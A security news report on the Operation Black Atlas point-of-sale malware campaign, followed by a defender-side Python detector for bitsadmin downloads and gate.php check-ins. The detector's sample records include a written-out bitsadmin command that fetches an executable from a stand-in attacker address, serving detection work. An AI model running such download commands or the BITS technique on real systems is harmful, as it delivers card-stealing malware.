Operation Black Atlas, a campaign aimed at infecting point of sale (PoS) systems around the world, has managed to infect more companies and is using the modular Gorynych/Diamond Fox botnet to exfiltrate data, Trend Micro researchers warn.
Earlier this month, the security company revealed that cybercriminals were using multiple tools to compromise businesses that use card payment systems, including those in healthcare and retail, and to infect targeted systems with various PoS malware, including the BlackPOS malware.
Trend Micro said the cybercriminals behind Operation Black Atlas are using a variety of pen testing tools to discover vulnerable systems, including brute force or dictionary attack tools, SMTP (Simple Mail Transfer Protocol) scanners, and remote desktop viewers. They used a “shotgun” approach to infiltrate networks, checking the ports exposed to the Internet on multiple targets at once, the researchers said.
The operation was focused on spreading a variety of malware, including BlackPoS, also known as Kaptoxa, while the masterminds behind it were also looking to steal user credentials for sites that hold sensitive information, for email accounts, and for Facebook. The operation is aimed at small and medium-sized businesses across the globe, and appears to be successfully infecting targets across a variety of industries.
Most recently, the infection spread to a multi-state healthcare provider, dental clinics, a machine manufacturer, a technology company focusing on insurance services, a gas station that has a multi-state presence, and a beauty supply shop, Trend Micro said in a new blog post on the operation.
The security company also explains that the cybercriminals behind Black Atlas introduce PoS threats into the compromised systems by abusing a legitimate Windows feature, the Background Intelligent Transfer Service (BITS) and its command-line client bitsadmin.exe. BITS is used for transferring files to and from Microsoft, mostly for system updates, and its traffic can easily bypass firewalls.
As part of this operation, bad actors use BITS to download NewPOSThings, a piece of malware that includes functions such as RAM scraper, keylogger, keep-alive reporting, and data transfer routines. Moreover, they load a variant of Neutrino or Kasidet, also with PoS card-scraping functionality, as well as CenterPOS, Project Hook, and PwnPOS in some cases.
The cybercriminals running Black Atlas also managed to build a replica of the Gorynych/Diamond Fox botnet malware and repurposed it to specifically look for the output file of the BlackPoS malware, which contains the harvested credit card data. The modular botnet also includes plugins for grabbing screenshots, passwords, email, and more.
The security researchers explain that Gorynych routines focus mainly on anti-analysis, information theft, and installation, and that the plugins extend its functionality. The Diamond Fox builder has the keylogger and PoS grabber functionalities disabled by default, but they have been turned on as part of Operation Black Atlas.
After infection, Gorynych downloads its plugins and reports to its server via gate.php using HTTP POST, with its own user-agent string, which is stored in the configuration file. The information is encrypted using a simple XOR operation, Trend Micro explained. The security researchers also managed to extract hashes, addresses, and other indicators related to Gorynych and included them in an IOC document, and offer details on the entire Operation Black Atlas in a technical brief.
The security firm notes that companies threatened by this operation should assess their security posture and apply multiple PoS defense strategies, with network segmentation and isolation of the cardholder data environment from other networks considered a standard approach. Large organizations should eliminate unnecessary data and monitor the information that remains, while also ensuring, through regular security checks, that essential controls are running and that event logs are monitored.
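As an added defender-side example (not code from Trend Micro's report or from the malware), the following Python sketch applies the two observable indicators described above, bitsadmin.exe transfers from hosts outside an allow-list and HTTP POST check-ins to gate.php, to a few constructed telemetry records; the key=value record format, the allow-listed update host and the 203.0.113.10 address are assumptions.

```python
import re
from urllib.parse import urlparse

# Constructed sample telemetry (not from the report): process-creation and web-proxy
# records in an assumed key=value form; 203.0.113.10 stands in for a C&C address.
SAMPLE_EVENTS = [
    'type=process image="C:\\Windows\\System32\\bitsadmin.exe" '
    'cmdline="bitsadmin /transfer job1 /download /priority high '
    'http://203.0.113.10/files/np.exe C:\\ProgramData\\np.exe"',
    'type=process image="C:\\Windows\\System32\\bitsadmin.exe" '
    'cmdline="bitsadmin /transfer wu /download http://download.windowsupdate.com/x.cab C:\\t.cab"',
    'type=http method=POST host=203.0.113.10 path=/panel/gate.php '
    'ua="Mozilla/4.0 (compatible; MSIE 6.0)"',
    'type=http method=GET host=www.example.com path=/gate.php ua="Mozilla/5.0"',
]

# Hosts BITS is legitimately expected to fetch from in this (assumed) environment.
ALLOWED_BITS_HOSTS = {"download.windowsupdate.com"}

_KV = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
_URL = re.compile(r'https?://\S+')


def parse_event(line):
    """Turn one key=value record into a dict; quoted values may contain spaces."""
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in _KV.finditer(line)}


def check_bits_download(ev):
    """Flag bitsadmin transfers from a non-allow-listed host. BITS itself is
    legitimate and usually allowed out through the firewall, so the source host
    of the job, not the process, is the signal."""
    if ev.get("type") != "process" or not ev.get("image", "").lower().endswith("\\bitsadmin.exe"):
        return None
    cmd = ev.get("cmdline", "").lower()
    if "/transfer" not in cmd and "/addfile" not in cmd:
        return None
    for url in _URL.findall(ev.get("cmdline", "")):
        host = urlparse(url).hostname or ""
        if host not in ALLOWED_BITS_HOSTS:
            return f"bitsadmin download from non-allow-listed host {host}"
    return None


def check_gate_post(ev):
    """Flag HTTP POSTs to a path ending in gate.php, the check-in the report names;
    the user-agent is included so it can be compared with the sample's config."""
    if ev.get("type") != "http" or ev.get("method") != "POST":
        return None
    if ev.get("path", "").rsplit("/", 1)[-1].lower() != "gate.php":
        return None
    return f"POST to {ev.get('host')}{ev.get('path')} with UA {ev.get('ua')!r}"


def scan(lines):
    """Return (record index, finding) pairs for every record that trips a rule."""
    return [(i, hit) for i, line in enumerate(lines)
            for hit in (r(parse_event(line)) for r in (check_bits_download, check_gate_post)) if hit]
```

Running `scan(SAMPLE_EVENTS)` flags the bitsadmin job pulling from 203.0.113.10 and the POST to /panel/gate.php, while the Windows Update transfer and the GET to gate.php pass.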